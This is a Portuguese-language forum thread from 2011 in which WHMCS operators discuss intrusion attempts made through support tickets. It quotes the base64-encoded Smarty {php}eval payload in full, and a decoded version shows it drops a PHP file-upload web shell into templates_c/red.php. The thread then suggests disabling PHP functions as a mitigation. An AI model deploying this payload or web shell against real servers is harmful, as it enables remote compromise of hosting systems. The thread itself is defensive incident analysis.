Tentativas de invasão em meu WHMCS

[Clebson]

Tb recebi:

Detalhe, como exatamente eu descripto este código para saber que comando/script esta sendo executado ?

Através do site: http://base64decode.org/

O código que você recebeu vai criar um arquivo com o nome red.php na pasta /templates_c.

Recebi o mesmo código aqui, mas não foi dessa vez que essa "criança" vai invadir meu WHMCS, não por este método rsrs.

[Cristian Augusto]

Detalhe, como exatamente eu descripto este código para saber que comando/script esta sendo executado ?

Simples:

<?echo base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX 2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw= =');?>

[Visitante]

Simples:

Se ele fizer assim vai ser a mesma coisa que o cara quer fazer, hahaha...

--

Vá no http://inverterlink.com.br/

Coloque o código no base64, vai te dar este código:

$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");$fo = fopen("templates_c/red.php","w");fwrite($fo,$code);

Então coloque este base64 denovo.. E vai ter o seguinte:

<?phpecho '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }	else { echo '<b>Upload GAGAL !!!</b><br><br>'; }}?>

Juntando tudo...

$code = 

<?phpecho '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }	else { echo '<b>Upload GAGAL !!!</b><br><br>'; }}?>

;$fo = fopen("templates_c/red.php","w");fwrite($fo,$code);

[Cristian Augusto]

Se ele fizer assim vai ser a mesma coisa que o cara quer fazer, hahaha...

Testei aqui no meu Apache local e não foi criado nenhum arquivo..

[Visitante]

Testei aqui no meu Apache local e não foi criado nenhum arquivo..

Está com WHMCS, php e etc instalado??

[Cristian Augusto]

Apenas o WHMCS não, pois é o Apache do AppServ...

Mas testei este echo que você falou que iria criar o arquivo, mas não criou.

Editado Dezembro 9, 2011 por CristianAugusto
acrescentar

[Cassiano Teixeira]

Hoje mais cedo, foi aberto um tickets com o seguinte conteudo

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php})[/CODE]

Gostaria de saber se alguem pode me ajudar sobre isso.. O que pode ser, se realmente é uma tentativa de ataques através de alguma falha do WHMCS 5.02 - enfim, se alguem puder dar maior explicação.. Já abrir um tickets no WHMCS, mais até agora não recebi retorno deste. Resolvi postar aqui, para saber se já aconteceu com alguem aqui..

Aparentemente não houve nenhum dano, mais estou verificando parte por parte..

Agradeço desde já..

Editado Dezembro 9, 2011 por Cassiano Teixeira
Corrigir erros

[Agencia Moderna]

Uma sugestão: Não é recomendável desabilitar a função base64_decode e outras do mesmo tipo no php.ini? Acho que o WHMCS não usa essas funções.

[Agencia Moderna]

Bom, testei aqui e a príncipio não houve problemas... Quem quiser testar é so por isso no seu php.ini (Detalhe: se você tiver algum CMS na mesma conta do WHMCS, ele pode apresentar problemas):

disable_functions = base64_decode, fopen, unlink

Eu acho que por hora isso pode resolver.

Editado Dezembro 9, 2011 por Rickybg

[Cristian Augusto]

Além do base64, não existe outra função que possa ser usada?